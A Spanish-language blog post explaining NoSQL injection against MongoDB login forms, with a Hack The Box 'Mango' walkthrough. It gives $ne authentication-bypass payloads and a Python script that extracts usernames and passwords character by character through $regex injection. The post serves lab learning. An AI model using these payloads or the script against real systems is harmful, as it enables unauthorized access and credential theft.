<!DOCTYPE html><html lang="es"> <head><meta charset="UTF-8"><meta name="description" content="Dashboard de recursos y blog de Raúl Riesco"><meta name="viewport" content="width=device-width"><link rel="icon" type="image/svg+xml" href="/favicon.ico"><meta name="generator" content="Astro v4.16.19"><title>Inyecciones NoSQL (MongoDB) y extracción de información | Blog</title><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600;700&display=swap" rel="stylesheet"><meta name="astro-view-transitions-enabled" content="true"><meta name="astro-view-transitions-fallback" content="animate"><style>.post-content{max-width:800px;margin:4rem auto;background:#1e293b4d;backdrop-filter:blur(12px);border:1px solid rgba(255,255,255,.1);border-radius:1.5rem;padding:3rem}.post-header{margin-bottom:3rem;border-bottom:1px solid rgba(255,255,255,.1);padding-bottom:2rem}.back-link{color:var(--accent-light);text-decoration:none;font-weight:500;display:inline-block;margin-bottom:1.5rem}.post-meta{color:var(--text-muted);font-size:.9rem;margin-bottom:1rem;text-transform:uppercase;letter-spacing:.05em}.post-header h1{font-size:3rem;margin:0;line-height:1.1}.hero-image{width:100%;border-radius:1rem;margin-top:2rem}.markdown-body{line-height:1.8;font-size:1.1rem;color:#e2e8f0}.markdown-body h2{font-size:2rem;margin-top:3rem;margin-bottom:1.5rem;color:#fff}.markdown-body h3{font-size:1.5rem;margin-top:2.5rem;margin-bottom:1rem;color:#fff}.markdown-body p{margin-bottom:1.5rem}.markdown-body ul,.markdown-body ol{margin-bottom:1.5rem;padding-left:1.5rem}.markdown-body li{margin-bottom:.5rem}.markdown-body code{background:#0f172acc;padding:.2rem .4rem;border-radius:.3rem;font-family:Fira Code,monospace;font-size:.9em}.markdown-body pre{background:#0f172a!important;padding:1.5rem;border-radius:1rem;overflow-x:auto;margin:2rem 0;border:1px solid rgba(255,255,255,.1)}.markdown-body img{max-width:100%;border-radius:.75rem;margin:2rem 0;border:1px solid rgba(255,255,255,.1)}.post-footer{margin-top:4rem;padding-top:2rem;border-top:1px solid rgba(255,255,255,.1)}@media (max-width: 768px){.post-content{padding:1.5rem;margin:1rem}.post-header h1{font-size:2rem}}
.astro-route-announcer{position:absolute;left:0;top:0;clip:rect(0 0 0 0);clip-path:inset(50%);overflow:hidden;white-space:nowrap;width:1px;height:1px}:root{--accent: 136, 58, 234;--accent-light: 224, 204, 250;--accent-dark: 49, 10, 101;--accent-gradient: linear-gradient( 45deg, rgb(var(--accent)), rgb(var(--accent-light)) 30%, white 60% );--bg-color: #020617;--card-bg: rgba(30, 41, 59, .5);--text-color: #f8fafc;--text-muted: #94a3b8}html{font-family:Outfit,sans-serif;background:var(--bg-color);color:var(--text-color);scroll-behavior:smooth}body{margin:0;padding:0;min-height:100vh;display:flex;flex-direction:column;align-items:center;overflow-x:hidden}.background-radial{position:fixed;top:0;left:0;width:100%;height:100%;z-index:-1;background:radial-gradient(circle at 50% 0%,#1e3a8a4d,#020617 70%)}main{width:100%;max-width:1200px;padding:2rem;box-sizing:border-box}h1,h2,h3{font-weight:700;letter-spacing:-.025em}a{color:inherit;text-decoration:none}*{box-sizing:border-box}
</style><script type="module" src="/_astro/hoisted.BScVxmeO.js"></script></head> <body> <div class="background-radial"></div> <main>  <article class="post-content"> <div class="post-header"> <a href="/blog" class="back-link">&larr; Volver al Blog</a> <div class="post-meta"> 9 de febrero de 2022 <span class="author"> • Por Raúl Riesco</span> </div> <h1>Inyecciones NoSQL (MongoDB) y extracción de información</h1>  </div> <div class="markdown-body"> <h2 id="explicación-teórica">Explicación teórica</h2>
<p>En alguna ocasión, y muy de refilón, había tenido que lidiar con bases de datos NoSQL para alguna cosa muy sencilla y puntual. Sin embargo, en cuestiones de seguridad, nunca me había topado con ellas.</p>
<p>No voy a explicar aquí lo que son las archiconocidas inyecciones SQL porque esto sólo pretende ser una nota personal y/o idea para una futura práctica, además de haber documentación a paladas en Internet para enterarse.</p>
<p>La idea principal es que poniendo el ejemplo de un formulario de login, una vez introducidos usuario y contraseña, estos se verificarán contra la BBDD NoSQL (en nuestro caso MongoDB) tal y como podría suceder con una BBDD SQL. La diferencia obvia entre una inyección SQL y una NoSQL es la gramática y la sintaxis.</p>
<p>Puesto que las BBDD NoSQL no tienen un lenguaje estandarizado, haremos uso de algunos operadores para extraer información. Por ejemplo, en el caso que se comentaba de un formulario de login, podemos utilizar operadores como <code>$gt</code> (grater than, mayor que) o <code>$ne</code> (not equal, no igual a). Así las cosas, en el ejemplo del login que comentábamos, suponiendo que la petición se realiza por POST y con DATA una forma de hacer un bypass de la autenticación sería:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="http"><code><span class="line"><span style="color:#E1E4E8">username[</span><span style="color:#FDAEB7;font-style:italic">$ne</span><span style="color:#E1E4E8">]=invent&#x26;password[</span><span style="color:#FDAEB7;font-style:italic">$ne</span><span style="color:#E1E4E8">]=invent</span></span>
<span class="line"></span></code></pre>
<p>Si el usuario/password no es <code>ìnvent</code> esta condición se cumple y habremos realizado el bypass de la autenticación.</p>
<p>De la misma forma, usando estos operadores, así como otro dedicado a las expresiones regulares: <code>$regex</code>, podremos ir extrayendo información de la base de datos. Vamos a demostrar que podemos obtener tanto los usuarios en primera instancia, como el password a partir de ellos:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="http"><code><span class="line"><span style="color:#E1E4E8">username[</span><span style="color:#FDAEB7;font-style:italic">$ne</span><span style="color:#E1E4E8">]=invent&#x26;password[</span><span style="color:#FDAEB7;font-style:italic">$regex</span><span style="color:#E1E4E8">]=r.*</span></span>
<span class="line"></span></code></pre>
<p>Con esta sentencia, si el nombre de usuario no es <code>invent</code> y, además, el password cumple la expresión regular (que el valor de password empiece por r y vaya seguido de cualquier número y tipo de carácteres), tendremos una respuesta positiva de algún modo.</p>
<p>La idea sería ir iterando a través de todas las letras y carácteres del alfabeto con el fin de ir ensamblando los valores que nos den respuesta positiva y que, finalmente, formarán el usuario/password que buscamos.</p>
<h2 id="caso-práctico">Caso práctico</h2>
<h3 id="authentication-bypass">Authentication bypass</h3>
<p>Veamos un caso práctico con la máquina Mango de Hack the box.</p>
<p>Tenemos una pantalla de login tal que así:</p>
<p><img src="/img/nosqli/mango_login.png" alt=""></p>
<p>Y el intento de login infructuoso, nos da como resultado una respuesta <code>200 OK</code></p>
<p><img src="/img/nosqli/1.png" alt=""></p>
<p><img src="/img/nosqli/2.png" alt=""></p>
<p>Sin embargo, utilizando el primer payload que hemos visto, obtenemos un <code>302 Found</code>, que en el navegador comprobamos que se corresponde con una respuesta positiva de la base de datos y, por ende, en auténtico bypass de la autenticación:</p>
<p><img src="/img/nosqli/3.png" alt=""></p>
<h3 id="extracción-de-usuarios-y-contraseñas">Extracción de usuarios y contraseñas</h3>
<p>Para este caso, vamos a usar un script disponible en <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#post-with-urlencoded-body">PayloadAllTheThings</a> pero ligeramente modificado para nuestras necesidades:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> urllib3</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> string</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> urllib</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> re</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> time</span></span>
<span class="line"><span style="color:#E1E4E8">urllib3.disable_warnings()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E1E4E8">username</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">""</span></span>
<span class="line"><span style="color:#E1E4E8">password</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">""</span></span>
<span class="line"><span style="color:#E1E4E8">u</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">"http://laquesea/"</span></span>
<span class="line"><span style="color:#E1E4E8">headers</span><span style="color:#F97583">=</span><span style="color:#E1E4E8">{</span><span style="color:#9ECBFF">'content-type'</span><span style="color:#E1E4E8">: </span><span style="color:#9ECBFF">'application/x-www-form-urlencoded'</span><span style="color:#E1E4E8">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F97583">while</span><span style="color:#79B8FF"> True</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">     for</span><span style="color:#E1E4E8"> c </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> string.printable: </span><span style="color:#6A737D">#Si excluimos la a de todas las iteraciones y el user contiene la a... no lo sacará</span></span>
<span class="line"><span style="color:#E1E4E8">            payload</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">'username=</span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">&#x26;password[$regex]=^</span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">&#x26;login=login'</span><span style="color:#F97583"> %</span><span style="color:#E1E4E8">(username,re.escape(password </span><span style="color:#F97583">+</span><span style="color:#E1E4E8"> c))</span></span>
<span class="line"><span style="color:#E1E4E8">            r </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> requests.post(u, </span><span style="color:#FFAB70">data</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> payload, </span><span style="color:#FFAB70">headers</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> headers, </span><span style="color:#FFAB70">verify</span><span style="color:#F97583"> =</span><span style="color:#79B8FF"> False</span><span style="color:#E1E4E8">, </span><span style="color:#FFAB70">allow_redirects</span><span style="color:#F97583"> =</span><span style="color:#79B8FF"> False</span><span style="color:#E1E4E8">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F97583">            if</span><span style="color:#E1E4E8"> r.status_code </span><span style="color:#F97583">==</span><span style="color:#79B8FF"> 302</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#79B8FF">               print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">"Found one more char : </span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">"</span><span style="color:#F97583"> %</span><span style="color:#E1E4E8"> (password</span><span style="color:#F97583">+</span><span style="color:#E1E4E8">c))</span></span>
<span class="line"><span style="color:#E1E4E8">               password </span><span style="color:#F97583">+=</span><span style="color:#E1E4E8"> c</span></span>
<span class="line"></span></code></pre>
<p>Puesto que primero queremos extraer los usuarios, utilizaremos una inyección que lo consiga mediante <code>$regex</code> en el username y un <code>$ne</code> que se cumpla en el campo password:</p>
<p><img src="/img/nosqli/8.png" alt=""></p>
<p>Y vemos que el script funciona bien:</p>
<p><img src="/img/nosqli/9.png" alt=""></p>
<p>Puede que haya más usuarios, ahora lanzaremos el script de la misma forma pero excluyendo usuarios que empiecen por <code>a</code> (sino volvería a salir <code>admin</code>):</p>
<p><img src="/img/nosqli/10.png" alt=""></p>
<p><img src="/img/nosqli/11.png" alt=""></p>
<p>Claro, el problema es que si excluimos la <code>a</code> de la iteración, si el nuevo nombre de usuario la contiene, no la encontrará y no podrá seguir extrayendo el username. Sabiendo ya que el nuevo usuario empieza por <code>m</code>, actuamos en consecuencia:</p>
<p><img src="/img/nosqli/12.png" alt=""></p>
<p><img src="/img/nosqli/13.png" alt=""></p>
<p>Teniendo ya los nombres de usuario, vamos a obtener sus contraseñas haciendo uso de ellos, utilizando esta vez la  inyección el el campo password:</p>
<p><img src="/img/nosqli/14.png" alt=""></p>
<p><img src="/img/nosqli/15.png" alt=""></p>
<p><img src="/img/nosqli/16.png" alt=""></p>
<p><img src="/img/nosqli/17.png" alt=""></p>
<p>Y esta es una explicación básica, sencilla y somera de las nociones de inyecciones NoSQL.</p>
<p>También existe la opción, un poco menos cómoda pero más sencilla, de realizar este proceso con <a href="https://rioasmara.com/2020/08/13/nosql-injection-and-bruteforce/">Burp Suite</a></p> </div> <div class="post-footer"> <a href="/blog" class="back-link">&larr; Volver al Blog</a> </div> </article>  </main>  </body> </html> 